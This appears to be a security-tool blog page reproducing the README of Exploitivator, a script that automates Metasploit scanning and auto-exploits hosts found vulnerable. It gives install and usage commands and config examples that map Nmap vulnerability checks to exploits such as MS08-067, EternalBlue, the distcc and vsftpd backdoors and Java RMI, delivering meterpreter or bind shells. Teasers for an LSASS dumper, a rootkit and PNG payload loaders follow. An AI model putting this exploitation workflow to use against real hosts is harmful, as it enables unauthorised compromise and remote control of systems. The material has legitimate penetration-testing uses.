Exploitivator is a automate Metasploit scanning and exploitation. This has only been tested on Kali.
It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/
Install the necessary Kali packages and the PostgreSQL gem for Ruby: apt-get install postgresql libpq-dev git-core gem install pg
Install current version of the msfrpc Python module from git: git clone git://github.com/SpiderLabs/msfrpc.git msfrpc cd msfrpc/python-msfrpc python setup.py install.
Also Read –Attack Range : Tool To Simulate Attacks Against & Collect Data Into Splunk
Usage
Before running either of the scripts, load msfconsole and start the MSGRPC service. MSGRPC can be started with msfrpcd in Metasploit as follows: load msgrpc Pass=abc123
The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt).
Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.
Command line usage:
Examples: The application can be run as follows, where ‘10.128.108.178’ is the IP address of the attack machine, ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123
MSFScan
Command line usage: ./msf_scan.py filename ./msf_scan.py filename MSF_DB_Username MSF_DB_Password
Examples: The application can be run as follows, where ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./msf_scan.py hosts.txt msf abc123
To run with ‘hosts.txt’ as a list of target hosts, using the script’s default Metasploit Postgres username(msf) and the script’s default Metasploit Postgres password(abc123): ./msf_scan.py hosts.txt
Config Files
Both scripts rely on config files to provide details of required Nmap and Metasploit scams and attacks.
MSFScan
The script uses a config file with the name ‘scan_types.cfg’. This contains a list of paths for any Metasploit scans the are to run against the targets. e.g.: auxiliary/scanner/dcerpc/endpoint_mapper auxiliary/scanner/smb/smb_version auxiliary/scanner/x11/open_x11 auxiliary/scanner/discovery/ipv6_multicast_ping auxiliary/scanner/discovery/ipv6_neighbor auxiliary/scanner/smb/smb_login
This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg). These use ‘##’ as a separator and have the following formats.
exploitivator_scan.cfg: [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional – grep command to be used if Nmap’s greppable output is being used]
In the above format:
An example file content is shown below: SMB_08-067##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms08-067.nse##-oX ms_08_067.xml SMB_09-050##-p U:137,U:139,T:139,T:445 –script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml SMB_10-054##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms10-054.nse##-oX ms_10_054.xml SMB_10-061##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms10-061.nse##-oX ms_10_061.xml SMB_17-010##-p U:137,U:139,T:139,T:445 –script smb-vuln-ms17-010##-oX ms_17_010.xml DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep “3632/open/tcp//distccd” JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep “1099/open/tcp//rmi VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep “vsftpd 2.3.4”
exploitivator.cfg: [Label]##[Metasploit exploit path]##[Optional – Metasploit payload details]
An example file content is shown below: SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none
bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…
Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…
Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…
Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…